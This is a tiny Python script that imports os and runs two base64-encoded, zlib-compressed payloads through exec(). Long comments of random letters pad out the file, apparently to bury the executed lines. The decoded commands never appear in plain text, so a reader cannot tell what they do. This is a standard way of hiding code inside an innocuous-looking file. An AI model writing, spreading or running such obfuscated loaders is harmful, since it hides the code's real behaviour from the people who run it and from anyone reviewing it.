
import os
#gdgdhhsbshyyytwtwyyTTTRYRyrCTc5GYYYYYhgyyftTtYyyTYyTtYyYyYyYYYYyYyYyYyYYYyYyYy
import zlib,base64
exec(zlib.decompress(base64.b64decode("eJzLL9YrriwuSc3VUErPLFEoKM3JUdIEAFaXB2w=")))#bsskbsbiseddibiidbiebeishsesuuuueesehIHIIEHIIHRISHHHRHURHSIRHIIIIIXRIDRRIHRIIEISIDHESUESJEEBSJEEJJZBEJEBEEBEJSBIRRISSBRISIIIRRIIBRIRBBRBBEISBBIIIBBRBIIEEEBZIIISBSIBBBEEBIIISBJBSBBESBEJJBBEBBJJBIZIBBIBEBSSSRIISEEIRIHEHHRHIHHIRSHHIIEHHEEHHEIDHEIISEBESISBBJBRIBSISIIBSBIDRIRBSIRRBSSIBSSRRBIIRBBSRSBBIRRJ
#evuuhehhhihhihehiihihhiheiidheidhiieidhhdihidiihieidhihdiehdieeiidhheeidheiheedihidieddeedbbedbbkkkdkkbeededeidebdkedbbkebkekkbbkkbbdebbdkbbekkbbbebbddbjbihibdibdiiedebbdbbiddbddjdjjedbdjdbdiibdkkbdkdbiibbieiiddbiddbidddieedbbibdbbiiiineiiddbddbeideornrnnoonnroondrdnonnnrdnoroonndnkkxnxenkxsxnxxnennddoeeonndeenjxeniijiroooddhridhhiedriddididrhhjjiihiirhhriididiihiriiiidriibribribribribjidirbd
exec(zlib.decompress(base64.b64decode("eJzLL9YrriwuSc3VUEpKLM5QKEotLE0tLtErzlDSBACYRwob")))#ksbjebjshrjsjhshjjbdjjpbbbjjejjjbddjjjbdjjbdjjesbbeeibsebseubbbuueduesevvhrvvuussburvvssubbssubrribeisbeisbiebseibeebbbhsidbiieeisdhiebiebeeibirzzrrrrrrirxxbbbjbjzejjzzbebbjjbjjbjbjejjbbbejjebjebezsbejebsjjsjejzezzbszbejbzjjbjz
